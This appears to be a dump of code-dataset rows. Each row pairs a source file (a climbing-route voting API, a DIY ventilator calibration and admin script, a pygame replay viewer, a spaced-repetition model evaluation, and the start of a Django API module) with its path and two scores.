values[mongo_vote["value"]] = 1
return max(values, key=values.get, default=None)
def average(mongo_votes):
if len(mongo_votes) == 0:
return None
else:
return sum([mongo_vote["value"] for mongo_vote in mongo_votes]) / len(mongo_votes)
class ClimbType(str, Enum):
boulder = "boulder"
sport = "sport"
deep_water_solo = "deep_water_solo"
traditional = "traditional"
partially_bolted = "partially_bolted"
ice_or_mixed = "ice_or_mixed"
aid = "aid"
mountain = "mountain"
router, MainModel, vote_models = create_api_router(
model_name="Climbs",
collection_name="climbs",
item_name="climb",
statics=dict(
crag_id=UUID,
sector_id=UUID,
),
voted=[
VoteDefinition(
model_name="ClimbNameVote",
collection_name="name_votes",
item_name="name_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="RatingVote",
collection_name="rating_votes",
item_name="rating_vote",
type=conint(ge=0, le=5),
aggregation=VoteAggregation(
fn=average,
name="average_rating",
type=float,
),
),
VoteDefinition(
model_name="GradeVote",
collection_name="grade_votes",
item_name="grade_vote",
type=UUID,
aggregation=VoteAggregation(
fn=most_voted,
name="most_voted_grade",
type=UUID,
),
),
VoteDefinition(
model_name="ClimbTypeVote",
collection_name="climb_type_votes",
item_name="climb_type_vote",
type=ClimbType,
),
VoteDefinition(
model_name="SitStartVote",
collection_name="sit_start_votes",
item_name="sit_start_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="DefinedStartVote",
collection_name="defined_start_votes",
item_name="defined_start_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="EliminationsVote",
collection_name="eliminations_votes",
item_name="eliminations_vote",
type=constr(min_length=1, strip_whitespace=True), # TODO: draw area of eliminations?
),
VoteDefinition(
model_name="ClimbDescriptionVote",
collection_name="description_votes",
item_name="description_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="BrokenVote",
collection_name="broken_votes",
item_name="broken_vote",
type=bool,
),
# guide book grade?
# first ascent grade?
# point to other page with information?
# point to video + timestamp with beta
]
) | app/routers/climbs.py | from enum import Enum
from uuid import UUID
from pydantic.types import constr, conint
from app import create_api_router, VoteDefinition, VoteAggregation
def most_voted(mongo_votes):
values = dict()
for mongo_vote in mongo_votes:
if mongo_vote["value"] in values:
values[mongo_vote["value"]] += 1
else:
values[mongo_vote["value"]] = 1
return max(values, key=values.get, default=None)
def average(mongo_votes):
if len(mongo_votes) == 0:
return None
else:
return sum([mongo_vote["value"] for mongo_vote in mongo_votes]) / len(mongo_votes)
class ClimbType(str, Enum):
boulder = "boulder"
sport = "sport"
deep_water_solo = "deep_water_solo"
traditional = "traditional"
partially_bolted = "partially_bolted"
ice_or_mixed = "ice_or_mixed"
aid = "aid"
mountain = "mountain"
router, MainModel, vote_models = create_api_router(
model_name="Climbs",
collection_name="climbs",
item_name="climb",
statics=dict(
crag_id=UUID,
sector_id=UUID,
),
voted=[
VoteDefinition(
model_name="ClimbNameVote",
collection_name="name_votes",
item_name="name_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="RatingVote",
collection_name="rating_votes",
item_name="rating_vote",
type=conint(ge=0, le=5),
aggregation=VoteAggregation(
fn=average,
name="average_rating",
type=float,
),
),
VoteDefinition(
model_name="GradeVote",
collection_name="grade_votes",
item_name="grade_vote",
type=UUID,
aggregation=VoteAggregation(
fn=most_voted,
name="most_voted_grade",
type=UUID,
),
),
VoteDefinition(
model_name="ClimbTypeVote",
collection_name="climb_type_votes",
item_name="climb_type_vote",
type=ClimbType,
),
VoteDefinition(
model_name="SitStartVote",
collection_name="sit_start_votes",
item_name="sit_start_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="DefinedStartVote",
collection_name="defined_start_votes",
item_name="defined_start_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="EliminationsVote",
collection_name="eliminations_votes",
item_name="eliminations_vote",
type=constr(min_length=1, strip_whitespace=True), # TODO: draw area of eliminations?
),
VoteDefinition(
model_name="ClimbDescriptionVote",
collection_name="description_votes",
item_name="description_vote",
type=constr(min_length=1, strip_whitespace=True),
),
VoteDefinition(
model_name="BrokenVote",
collection_name="broken_votes",
item_name="broken_vote",
type=bool,
),
# guide book grade?
# first ascent grade?
# point to other page with information?
# point to video + timestamp with beta
]
) | 0.390011 | 0.163179 |
# Admin script for managing vent
import time
import socket
import requests
import logging
from multiprocessing import Value
import board
import digitalio
from adafruit_motorkit import MotorKit
import rpi2c
from actuator import peep
from sensor import sensor
from sensor.sensor_d6f import FlowSensorD6F
from sensor.sensor_lps import PressureSensorLPS
from actuator.valve import Breather
g_hostname = socket.gethostname()
g_ip_address = socket.gethostbyname(g_hostname)
g_tune_url = "http://%s:3000/tune" % (g_ip_address,)
def admin_help():
print("Enter cmd")
print("[c] [percent] calibrate inspiratory flow with percent valve open")
print("[d] [percent] calibrate expiratory flow with percent valve open")
print("[t] [percent] set max percent solenoid open")
print("[x] [cross] set peep crossing threshold")
print("[y] [steps] set number of steps for peep")
print("[z] [seconds] set peep step time")
print("[o] [0|50|100] set precent oxygen mix")
print("[h] print this help screen")
print("[] to exit")
def admin_request(setting, value):
r = requests.post(g_tune_url, json={
setting:value
})
def flow_calibrate(bus, percent, count):
print("runing calibration on bus %d" % (bus,))
# setup pressure sensors and zero pressure them
in_p1 = PressureSensorLPS(rpi2c.rpi_i2c(1), address=0x5d)
in_p2 = PressureSensorLPS(rpi2c.rpi_i2c(1), address=0x5c)
ex_p1 = PressureSensorLPS(rpi2c.rpi_i2c(3), address=0x5d)
ex_p2 = PressureSensorLPS(rpi2c.rpi_i2c(3), address=0x5c)
sensor.pressure_zero(in_p1, in_p2, ex_p1, ex_p2)
flow = FlowSensorD6F(rpi2c.rpi_i2c(1))
kit = MotorKit(i2c=rpi2c.rpi_i2c(1))
breather = Breather(kit.motor1, kit.motor2)
ox = Value('i', 0)
if bus == 1:
p1 = in_p1
p2 = in_p2
else:
p1 = ex_p1
p2 = ex_p2
# open valve
breather.throttle(percent, ox)
total = 0
samples = 0
vmin = 100
vmax = 0
THRESH = 50
logging.warning("Start calibration")
for i in range(0,count):
p1.read()
p2.read()
flow.read()
r = flow.data.rate
hp = p2.data.pressure
lp = p1.data.pressure
if hp > (lp + THRESH):
vco = r / ((hp-lp)**0.5)
total += vco
samples += 1
vmin = min(vco, vmin)
vmax = max(vco, vmax)
logging.warning("%f %f %f %f" % (r, vco, hp, lp))
time.sleep(0.1)
# close valve
logging.warning("VCO: %f min %f max %f" % (total/samples, vmin, vmax))
breather.throttle(0, ox)
if __name__ == '__main__':
print("Connecting to vent @ %s" % (g_ip_address,))
admin_help()
while True:
try:
user = input()
if user == "":
break
if user == "h":
admin_help()
continue
(cmd, val) = user.split()
if cmd == "c":
flow_calibrate(1, int(val), 200)
elif cmd == "d":
flow_calibrate(3, int(val), 200)
elif cmd == "t":
admin_request("top", int(val))
elif cmd == "x":
admin_request("pcross", float(val))
elif cmd == "y":
admin_request("pstep", int(val))
elif cmd == "z":
admin_request("pstept", float(val))
elif cmd == "o":
admin_request("oxp", int(val))
except Exception as e:
print(e) | admin.py |
# Admin script for managing vent
import time
import socket
import requests
import logging
from multiprocessing import Value
import board
import digitalio
from adafruit_motorkit import MotorKit
import rpi2c
from actuator import peep
from sensor import sensor
from sensor.sensor_d6f import FlowSensorD6F
from sensor.sensor_lps import PressureSensorLPS
from actuator.valve import Breather
g_hostname = socket.gethostname()
g_ip_address = socket.gethostbyname(g_hostname)
g_tune_url = "http://%s:3000/tune" % (g_ip_address,)
def admin_help():
print("Enter cmd")
print("[c] [percent] calibrate inspiratory flow with percent valve open")
print("[d] [percent] calibrate expiratory flow with percent valve open")
print("[t] [percent] set max percent solenoid open")
print("[x] [cross] set peep crossing threshold")
print("[y] [steps] set number of steps for peep")
print("[z] [seconds] set peep step time")
print("[o] [0|50|100] set precent oxygen mix")
print("[h] print this help screen")
print("[] to exit")
def admin_request(setting, value):
r = requests.post(g_tune_url, json={
setting:value
})
def flow_calibrate(bus, percent, count):
print("runing calibration on bus %d" % (bus,))
# setup pressure sensors and zero pressure them
in_p1 = PressureSensorLPS(rpi2c.rpi_i2c(1), address=0x5d)
in_p2 = PressureSensorLPS(rpi2c.rpi_i2c(1), address=0x5c)
ex_p1 = PressureSensorLPS(rpi2c.rpi_i2c(3), address=0x5d)
ex_p2 = PressureSensorLPS(rpi2c.rpi_i2c(3), address=0x5c)
sensor.pressure_zero(in_p1, in_p2, ex_p1, ex_p2)
flow = FlowSensorD6F(rpi2c.rpi_i2c(1))
kit = MotorKit(i2c=rpi2c.rpi_i2c(1))
breather = Breather(kit.motor1, kit.motor2)
ox = Value('i', 0)
if bus == 1:
p1 = in_p1
p2 = in_p2
else:
p1 = ex_p1
p2 = ex_p2
# open valve
breather.throttle(percent, ox)
total = 0
samples = 0
vmin = 100
vmax = 0
THRESH = 50
logging.warning("Start calibration")
for i in range(0,count):
p1.read()
p2.read()
flow.read()
r = flow.data.rate
hp = p2.data.pressure
lp = p1.data.pressure
if hp > (lp + THRESH):
vco = r / ((hp-lp)**0.5)
total += vco
samples += 1
vmin = min(vco, vmin)
vmax = max(vco, vmax)
logging.warning("%f %f %f %f" % (r, vco, hp, lp))
time.sleep(0.1)
# close valve
logging.warning("VCO: %f min %f max %f" % (total/samples, vmin, vmax))
breather.throttle(0, ox)
if __name__ == '__main__':
print("Connecting to vent @ %s" % (g_ip_address,))
admin_help()
while True:
try:
user = input()
if user == "":
break
if user == "h":
admin_help()
continue
(cmd, val) = user.split()
if cmd == "c":
flow_calibrate(1, int(val), 200)
elif cmd == "d":
flow_calibrate(3, int(val), 200)
elif cmd == "t":
admin_request("top", int(val))
elif cmd == "x":
admin_request("pcross", float(val))
elif cmd == "y":
admin_request("pstep", int(val))
elif cmd == "z":
admin_request("pstept", float(val))
elif cmd == "o":
admin_request("oxp", int(val))
except Exception as e:
print(e) | 0.225331 | 0.211417 |
import datetime
import json
from math import ceil
from dev01_22_19.data.characters.base import *
from roengine.game.recording import RecordingPlayer
class CustomPlayer(RecordingPlayer):
def apply_packet(self, packet, actual_time, expected_time):
bullets._bullets = pygame.sprite.Group(*[DummyBullet(i, self.game.bul_pics) for i in packet['bullets']])
self.game.players = pygame.sprite.Group(*[DummyPlayer(i, self.game.pic) for i in packet['players']])
self.game.player.score = packet['score']
self.game.player.rect.center = packet['pos']
self.game.player.health = packet['hp']
self.game.player.shield = packet['sh']
self.game.player.update_pos()
self.game.player.rotation = packet['rot']
self.game.player.image = pygame.transform.rotozoom(self.game.player.master_image, packet['rot'],
self.game.player.ZOOM)
self.game.player.mode = 'weapon' if packet['item'][0] == 'w' else 'ability'
if self.game.player.mode == 'weapon':
self.game.player.weapon = self.game.player.inv[packet['item'][1:]]
self.game.weapon_txt.update_text("Item: " + str(self.game.player.weapon))
self.game.player.weapon.ammo = packet['ammo']
self.game.reload_txt.update_text("%.1f" % packet["reload_prog"])
if self.game.player.mode == 'ability':
self.game.player.ability = self.game.player.abilities[packet['item'][1:]]
self.game.ammo_txt.update_text("%.1f" % packet['action_dur'])
self.game.reload_txt.update_text("%.1f" % packet["action_cool"])
self.game.weapon_txt.update_text("Ability: " + str(self.game.player.ability))
class DummyPlayer(pygame.sprite.Sprite):
def __init__(self, args, image):
self.pos, self.rot = args
pygame.sprite.Sprite.__init__(self)
self.image = image
self.rect = self.image.get_rect()
self.rect.center = self.pos
self.image = pygame.transform.rotozoom(self.image, self.rot, ZOOM_VALS['player'])
class DummyBullet(pygame.sprite.Sprite):
def __init__(self, args, image):
self.pos, self.rot, self.type = args
pygame.sprite.Sprite.__init__(self)
self.image = image[self.type]
self.rect = self.image.get_rect()
self.rect.center = self.pos
self.image = pygame.transform.rotozoom(self.image, self.rot, ZOOM_VALS['bullets'][self.type])
def fmtdeltatime(time):
ret = [0, 0, 0, str(time % 1)[2:]]
for i in range(2, -1, -1):
ret[i] = int(time % 60)
time = int(time / 60)
return "%.2i:%.2i:%.2i.%s" % tuple(ret)
class ReplayPlayerApp(Game):
def start(self):
self.replay = CustomPlayer(self)
self.replay.set_speed(1)
self.replay.start()
msg = self.replay.from_file("/Users/Grant/Downloads/latest.replay")
# print msg
print ("===================[NOW PLAYING: /Users/Grant/Downloads/latest.replay]====================")
print ("Created: %s" % datetime.datetime.fromtimestamp(msg['start']))
print ("Length: %s" % fmtdeltatime(msg['len']))
pygame.init()
self.screen = pygame.display.set_mode([640, 480], RESIZABLE)
self.map = Map([1500, 500])
sheet = pygame.image.load("./data/sprites/Player.png").convert_alpha()
self.pic = from_spritesheet([0, 0, 32, 32], sheet)
self.bul_pics = [from_spritesheet([32, 96, 32, 32], sheet), from_spritesheet([0, 96, 32, 32], sheet)]
self.hud_layer = Map([960, 720])
self.player = BasicCharacter(self)
self.player.update()
self.players = pygame.sprite.Group()
with open("./data/maps/%s.json" % msg['map'], 'r') as fp:
map_json = json.load(fp)
self.TEST_MAP = pygame.sprite.Group()
for i in map_json['blocks']:
self.TEST_MAP.add(Obstacle(i['size'], i['pos'], 1, i['color']))
self.background_col = map_json['background']['color']
self.spawn_locs = map_json['spawns']
self.clear_surf = pygame.Surface(HUD_RES, SRCALPHA, 32).convert_alpha()
self.hp_bar = ProgressBar((0, self.player.max_hp), 100,
(HUD_RES[0] - 200, 20), (2, 2), ((255, 0, 0), (128, 128, 128)))
self.hp_bar.rect.center = HUD_RES[0] / 2, 15
self.sh_bar = ProgressBar((0, self.player.max_shield[0]), 100,
(HUD_RES[0] - 200, 20), (2, 2), ((0, 0, 255), (128, 128, 128)))
self.sh_bar.rect.center = HUD_RES[0] / 2, 40
self.reload_progress = self.player.action_manager.action_duration - self.player.action_manager.progress
self.reload_txt = Text(str(self.reload_progress)[:3], bg=(255, 255, 255))
self.reload_txt.rect.right = HUD_RES[0] - 100
self.reload_txt.rect.centery = 65
self.weapon_txt = Text("Item: " + str(self.player.weapon), bg=(255, 255, 255))
self.weapon_txt.rect.center = HUD_RES[0] / 2, 65
self.debug_txt = Text("Ping: 0 | Recv: 0 | Send: 0", bg=(255, 255, 255))
self.debug_txt.rect.centerx = HUD_RES[0] / 2
self.debug_txt.rect.bottom = HUD_RES[1] - 5
self.hp_txt = Text("Health: " + str(self.player.health))
self.hp_txt.rect.center = self.hp_bar.rect.center
self.sh_txt = Text("Shield: 100")
self.sh_txt.rect.center = self.sh_bar.rect.center
self.kill_txt = Text("Score: 0", bg=(255, 255, 255))
self.kill_txt.rect.center = HUD_RES[0] / 2, 87
self.ammo_txt = Text(str(self.player.weapon.ammo) + '/inf', bg=(255, 255, 255))
self.ammo_txt.rect.left = 100
self.ammo_txt.rect.centery = 65
self.running = True
def tick_main(self):
self.replay.update()
# self.player.update(False, is_replay=True)
self.player.action_manager.tick()
self.player.weapon.tick()
self.hp_bar.val = self.player.health
self.sh_bar.val = self.player.shield
self.hp_bar.update()
self.sh_bar.update()
self.sh_txt.update_text("Shield: %i" % ceil(self.player.shield))
self.hp_txt.update_text("Health: %i" % ceil(self.player.health))
self.kill_txt.update_text("Score: %i" % ceil(self.player.score))
if self.player.mode == 'weapon':
#self.weapon_txt.update_text("Item: " + str(self.player.weapon))
#self.reload_progress = "%.1f" % \
# (self.player.action_manager.action_duration - self.player.action_manager.progress)
#self.reload_txt.update_text(self.reload_progress)
self.ammo_txt.update_text(str(self.player.weapon.ammo) + '/inf')
else:
pass # moved into replay player
#self.weapon_txt.update_text("Ability: " + str(self.player.ability))
#self.reload_txt.update_text("%.1f" % self.player.ability.get_cooldown())
#action_dur = "%.1f" % (self.player.action_manager.action_duration - self.player.action_manager.progress)
#self.ammo_txt.update_text(action_dur)
self.screen.fill([255, 255, 255])
self.hud_layer._map = self.clear_surf.copy()
self.hud_layer.draw_group(buttons.visible_bts)
self.hud_layer.draw_sprite(self.kill_txt)
self.hud_layer.draw_sprite(self.hp_bar)
self.hud_layer.draw_sprite(self.hp_txt)
self.hud_layer.draw_sprite(self.sh_bar)
self.hud_layer.draw_sprite(self.sh_txt)
if self.ammo_txt.text != '0.0':
self.hud_layer.draw_sprite(self.ammo_txt)
self.hud_layer.draw_sprite(self.weapon_txt)
if self.reload_txt.text != '0.0':
self.hud_layer.draw_sprite(self.reload_txt)
self.map.fill(self.background_col)
self.map.draw_group(bullets.get_group())
self.map.draw_group(self.TEST_MAP)
self.map.draw_sprite(self.player)
self.map.draw_group(self.players)
self.map.get_scroll(self.player.rect.center, self.screen, (self.screen.get_width() / 2,
self.screen.get_height() / 2), (True, True))
self.map.scale_to(self.screen, MAP_ZOOM)
self.map.blit_to(self.screen)
self.hud_layer.scale_to(self.screen, [1, 1])
self.hud_layer.blit_to(self.screen)
pygame.display.flip()
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_RIGHT:
self.replay.set_speed(self.replay.speed+0.5)
print self.replay.speed
if event.key == K_LEFT:
self.replay.set_speed(self.replay.speed-0.5)
print self.replay.speed
if event.type == VIDEORESIZE:
self.screen = pygame.display.set_mode(event.dict['size'], RESIZABLE)
if event.type == QUIT:
self.terminate()
def stop(self):
pygame.quit()
self.running = False
if __name__ == "__main__":
game = ReplayPlayerApp()
game.load()
reactor.run() | dev01_22_19/replay_player.py | import datetime
import json
from math import ceil
from dev01_22_19.data.characters.base import *
from roengine.game.recording import RecordingPlayer
class CustomPlayer(RecordingPlayer):
def apply_packet(self, packet, actual_time, expected_time):
bullets._bullets = pygame.sprite.Group(*[DummyBullet(i, self.game.bul_pics) for i in packet['bullets']])
self.game.players = pygame.sprite.Group(*[DummyPlayer(i, self.game.pic) for i in packet['players']])
self.game.player.score = packet['score']
self.game.player.rect.center = packet['pos']
self.game.player.health = packet['hp']
self.game.player.shield = packet['sh']
self.game.player.update_pos()
self.game.player.rotation = packet['rot']
self.game.player.image = pygame.transform.rotozoom(self.game.player.master_image, packet['rot'],
self.game.player.ZOOM)
self.game.player.mode = 'weapon' if packet['item'][0] == 'w' else 'ability'
if self.game.player.mode == 'weapon':
self.game.player.weapon = self.game.player.inv[packet['item'][1:]]
self.game.weapon_txt.update_text("Item: " + str(self.game.player.weapon))
self.game.player.weapon.ammo = packet['ammo']
self.game.reload_txt.update_text("%.1f" % packet["reload_prog"])
if self.game.player.mode == 'ability':
self.game.player.ability = self.game.player.abilities[packet['item'][1:]]
self.game.ammo_txt.update_text("%.1f" % packet['action_dur'])
self.game.reload_txt.update_text("%.1f" % packet["action_cool"])
self.game.weapon_txt.update_text("Ability: " + str(self.game.player.ability))
class DummyPlayer(pygame.sprite.Sprite):
def __init__(self, args, image):
self.pos, self.rot = args
pygame.sprite.Sprite.__init__(self)
self.image = image
self.rect = self.image.get_rect()
self.rect.center = self.pos
self.image = pygame.transform.rotozoom(self.image, self.rot, ZOOM_VALS['player'])
class DummyBullet(pygame.sprite.Sprite):
def __init__(self, args, image):
self.pos, self.rot, self.type = args
pygame.sprite.Sprite.__init__(self)
self.image = image[self.type]
self.rect = self.image.get_rect()
self.rect.center = self.pos
self.image = pygame.transform.rotozoom(self.image, self.rot, ZOOM_VALS['bullets'][self.type])
def fmtdeltatime(time):
ret = [0, 0, 0, str(time % 1)[2:]]
for i in range(2, -1, -1):
ret[i] = int(time % 60)
time = int(time / 60)
return "%.2i:%.2i:%.2i.%s" % tuple(ret)
class ReplayPlayerApp(Game):
def start(self):
self.replay = CustomPlayer(self)
self.replay.set_speed(1)
self.replay.start()
msg = self.replay.from_file("/Users/Grant/Downloads/latest.replay")
# print msg
print ("===================[NOW PLAYING: /Users/Grant/Downloads/latest.replay]====================")
print ("Created: %s" % datetime.datetime.fromtimestamp(msg['start']))
print ("Length: %s" % fmtdeltatime(msg['len']))
pygame.init()
self.screen = pygame.display.set_mode([640, 480], RESIZABLE)
self.map = Map([1500, 500])
sheet = pygame.image.load("./data/sprites/Player.png").convert_alpha()
self.pic = from_spritesheet([0, 0, 32, 32], sheet)
self.bul_pics = [from_spritesheet([32, 96, 32, 32], sheet), from_spritesheet([0, 96, 32, 32], sheet)]
self.hud_layer = Map([960, 720])
self.player = BasicCharacter(self)
self.player.update()
self.players = pygame.sprite.Group()
with open("./data/maps/%s.json" % msg['map'], 'r') as fp:
map_json = json.load(fp)
self.TEST_MAP = pygame.sprite.Group()
for i in map_json['blocks']:
self.TEST_MAP.add(Obstacle(i['size'], i['pos'], 1, i['color']))
self.background_col = map_json['background']['color']
self.spawn_locs = map_json['spawns']
self.clear_surf = pygame.Surface(HUD_RES, SRCALPHA, 32).convert_alpha()
self.hp_bar = ProgressBar((0, self.player.max_hp), 100,
(HUD_RES[0] - 200, 20), (2, 2), ((255, 0, 0), (128, 128, 128)))
self.hp_bar.rect.center = HUD_RES[0] / 2, 15
self.sh_bar = ProgressBar((0, self.player.max_shield[0]), 100,
(HUD_RES[0] - 200, 20), (2, 2), ((0, 0, 255), (128, 128, 128)))
self.sh_bar.rect.center = HUD_RES[0] / 2, 40
self.reload_progress = self.player.action_manager.action_duration - self.player.action_manager.progress
self.reload_txt = Text(str(self.reload_progress)[:3], bg=(255, 255, 255))
self.reload_txt.rect.right = HUD_RES[0] - 100
self.reload_txt.rect.centery = 65
self.weapon_txt = Text("Item: " + str(self.player.weapon), bg=(255, 255, 255))
self.weapon_txt.rect.center = HUD_RES[0] / 2, 65
self.debug_txt = Text("Ping: 0 | Recv: 0 | Send: 0", bg=(255, 255, 255))
self.debug_txt.rect.centerx = HUD_RES[0] / 2
self.debug_txt.rect.bottom = HUD_RES[1] - 5
self.hp_txt = Text("Health: " + str(self.player.health))
self.hp_txt.rect.center = self.hp_bar.rect.center
self.sh_txt = Text("Shield: 100")
self.sh_txt.rect.center = self.sh_bar.rect.center
self.kill_txt = Text("Score: 0", bg=(255, 255, 255))
self.kill_txt.rect.center = HUD_RES[0] / 2, 87
self.ammo_txt = Text(str(self.player.weapon.ammo) + '/inf', bg=(255, 255, 255))
self.ammo_txt.rect.left = 100
self.ammo_txt.rect.centery = 65
self.running = True
def tick_main(self):
self.replay.update()
# self.player.update(False, is_replay=True)
self.player.action_manager.tick()
self.player.weapon.tick()
self.hp_bar.val = self.player.health
self.sh_bar.val = self.player.shield
self.hp_bar.update()
self.sh_bar.update()
self.sh_txt.update_text("Shield: %i" % ceil(self.player.shield))
self.hp_txt.update_text("Health: %i" % ceil(self.player.health))
self.kill_txt.update_text("Score: %i" % ceil(self.player.score))
if self.player.mode == 'weapon':
#self.weapon_txt.update_text("Item: " + str(self.player.weapon))
#self.reload_progress = "%.1f" % \
# (self.player.action_manager.action_duration - self.player.action_manager.progress)
#self.reload_txt.update_text(self.reload_progress)
self.ammo_txt.update_text(str(self.player.weapon.ammo) + '/inf')
else:
pass # moved into replay player
#self.weapon_txt.update_text("Ability: " + str(self.player.ability))
#self.reload_txt.update_text("%.1f" % self.player.ability.get_cooldown())
#action_dur = "%.1f" % (self.player.action_manager.action_duration - self.player.action_manager.progress)
#self.ammo_txt.update_text(action_dur)
self.screen.fill([255, 255, 255])
self.hud_layer._map = self.clear_surf.copy()
self.hud_layer.draw_group(buttons.visible_bts)
self.hud_layer.draw_sprite(self.kill_txt)
self.hud_layer.draw_sprite(self.hp_bar)
self.hud_layer.draw_sprite(self.hp_txt)
self.hud_layer.draw_sprite(self.sh_bar)
self.hud_layer.draw_sprite(self.sh_txt)
if self.ammo_txt.text != '0.0':
self.hud_layer.draw_sprite(self.ammo_txt)
self.hud_layer.draw_sprite(self.weapon_txt)
if self.reload_txt.text != '0.0':
self.hud_layer.draw_sprite(self.reload_txt)
self.map.fill(self.background_col)
self.map.draw_group(bullets.get_group())
self.map.draw_group(self.TEST_MAP)
self.map.draw_sprite(self.player)
self.map.draw_group(self.players)
self.map.get_scroll(self.player.rect.center, self.screen, (self.screen.get_width() / 2,
self.screen.get_height() / 2), (True, True))
self.map.scale_to(self.screen, MAP_ZOOM)
self.map.blit_to(self.screen)
self.hud_layer.scale_to(self.screen, [1, 1])
self.hud_layer.blit_to(self.screen)
pygame.display.flip()
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_RIGHT:
self.replay.set_speed(self.replay.speed+0.5)
print self.replay.speed
if event.key == K_LEFT:
self.replay.set_speed(self.replay.speed-0.5)
print self.replay.speed
if event.type == VIDEORESIZE:
self.screen = pygame.display.set_mode(event.dict['size'], RESIZABLE)
if event.type == QUIT:
self.terminate()
def stop(self):
pygame.quit()
self.running = False
if __name__ == "__main__":
game = ReplayPlayerApp()
game.load()
reactor.run() | 0.25174 | 0.201754 |
import time
import pandas as pd
from model.utils import *
def dhp(line, h, d):
recall = int(line[0])
interval = int(line[1])
if recall == 1:
if interval == 0:
h = cal_start_halflife(d)
else:
p_recall = np.exp2(- interval / h)
h = cal_recall_halflife(d, h, p_recall)
else:
if interval == 0:
h = cal_start_halflife(d)
else:
p_recall = np.exp2(- interval / h)
h = cal_forget_halflife(d, h, p_recall)
d = min(d + 2, 18)
return h, d
def eval(testset, repeat, fold):
record = pd.DataFrame(
columns=['difficulty', 'r_history', 't_history',
't',
'h', 'hh', 'h_loss', 'p', 'pp', 'p_loss', 'total_cnt'])
p_loss = 0
h_loss = 0
count = 0
for idx, line in testset.iterrows():
line_tensor = lineToTensor(list(
zip([line['r_history']], [line['t_history']]))[0])
ph = 0
d = line['difficulty']
for j in range(line_tensor.size()[0]):
ph, d = dhp(line_tensor[j][0], ph, d)
# print(f'model: {m}\tsample: {line}\tcorrect: {interval}\tpredict: {float(output)}')
pp = np.power(2, -line['delta_t'] / ph)
p = line['p_recall']
p_loss += abs(p - pp) * line['total_cnt']
h = line['halflife']
h_loss += abs((ph - h) / h) * line['total_cnt']
count += line['total_cnt']
record = pd.concat([record, pd.DataFrame(
{'difficulty': [line['difficulty']],
'r_history': [line['r_history']],
't_history': [line['t_history']],
't': [line['delta_t']], 'h': [h],
'hh': [round(ph, 2)], 'p': [p],
'pp': [round(pp, 3)], 'p_loss': [round(abs(p - pp), 3)], 'h_loss': [round(abs((ph - h) / h), 3)],
'total_cnt': [line['total_cnt']]})],
ignore_index=True)
print(f"model: dhp")
print(f'sample num: {count}')
print(f"avg p loss: {p_loss / count}")
print(f"avg h loss: {h_loss / count}")
record.to_csv(f'./fit_result/dhp/repeat{repeat}_fold{fold}_{int(time.time())}.csv', index=False) | model/dhp.py | import time
import pandas as pd
from model.utils import *
def dhp(line, h, d):
recall = int(line[0])
interval = int(line[1])
if recall == 1:
if interval == 0:
h = cal_start_halflife(d)
else:
p_recall = np.exp2(- interval / h)
h = cal_recall_halflife(d, h, p_recall)
else:
if interval == 0:
h = cal_start_halflife(d)
else:
p_recall = np.exp2(- interval / h)
h = cal_forget_halflife(d, h, p_recall)
d = min(d + 2, 18)
return h, d
def eval(testset, repeat, fold):
    """Replay each test row's review history through `dhp` and report the
    weighted average recall-probability and halflife errors.

    Parameters
    ----------
    testset: pandas.DataFrame
        Rows with r_history/t_history, delta_t, p_recall, halflife,
        difficulty and total_cnt columns.
    repeat, fold: int
        Only used to name the result CSV written after this loop.
    """
    record = pd.DataFrame(
        columns=['difficulty', 'r_history', 't_history',
                 't',
                 'h', 'hh', 'h_loss', 'p', 'pp', 'p_loss', 'total_cnt'])
    # Running totals, weighted by each row's total_cnt.
    p_loss = 0
    h_loss = 0
    count = 0
    for idx, line in testset.iterrows():
        # Encode the (rating, interval) review history as a tensor.
        line_tensor = lineToTensor(list(
            zip([line['r_history']], [line['t_history']]))[0])
        ph = 0
        d = line['difficulty']
        # Step the DHP state through every past review of this item.
        for j in range(line_tensor.size()[0]):
            ph, d = dhp(line_tensor[j][0], ph, d)
        # print(f'model: {m}\tsample: {line}\tcorrect: {interval}\tpredict: {float(output)}')
        # Predicted recall probability implied by the predicted halflife.
        pp = np.power(2, -line['delta_t'] / ph)
        p = line['p_recall']
        p_loss += abs(p - pp) * line['total_cnt']
        h = line['halflife']
        h_loss += abs((ph - h) / h) * line['total_cnt']
        count += line['total_cnt']
        record = pd.concat([record, pd.DataFrame(
            {'difficulty': [line['difficulty']],
             'r_history': [line['r_history']],
             't_history': [line['t_history']],
             't': [line['delta_t']], 'h': [h],
             'hh': [round(ph, 2)], 'p': [p],
             'pp': [round(pp, 3)], 'p_loss': [round(abs(p - pp), 3)], 'h_loss': [round(abs((ph - h) / h), 3)],
             'total_cnt': [line['total_cnt']]})],
            ignore_index=True)
    print(f"model: dhp")
    print(f'sample num: {count}')
    print(f"avg p loss: {p_loss / count}")
    print(f"avg h loss: {h_loss / count}")
record.to_csv(f'./fit_result/dhp/repeat{repeat}_fold{fold}_{int(time.time())}.csv', index=False) | 0.296145 | 0.240273 |
import logging
import platform
import sched, threading
import subprocess
from django.http import HttpResponseForbidden
from django.http.request import QueryDict
from django.core.exceptions import ValidationError
from django.db.utils import IntegrityError
from utils import Status
from utils.typecheck import ensure_type
import utils.path as up
from server.utils import StatusResponse
from .models import (
Slave as SlaveModel,
Program as ProgramModel,
Script as ScriptModel,
Filesystem as FilesystemModel,
ScriptGraphFiles as SGFModel,
ScriptGraphPrograms as SGPModel,
)
from .scripts import Script
from .forms import SlaveForm, ProgramForm, FilesystemForm
from .errors import (
FsimError,
SlaveNotExistError,
ProgramNotExistError,
FilesystemNotExistError,
SimultaneousQueryError,
ScriptRunningError,
ScriptNotExistError,
)
from frontend import controller
from .controller import (
prog_start,
prog_stop,
fs_delete,
fs_move,
fs_restore,
prog_log_disable,
prog_log_enable,
prog_log_get,
script_deep_copy,
slave_wake_on_lan,
)
LOGGER = logging.getLogger("fsim.api")  # module-level logger shared by all API views
def script_put_post(data, script_id):
    """Shared body of the POST (`script_set`) and PUT (`script_entry`)
    handlers: decode `data` as a script and create or replace it.

    Parameters
    ----------
    data: str
        JSON encoded script.
    script_id: int or None
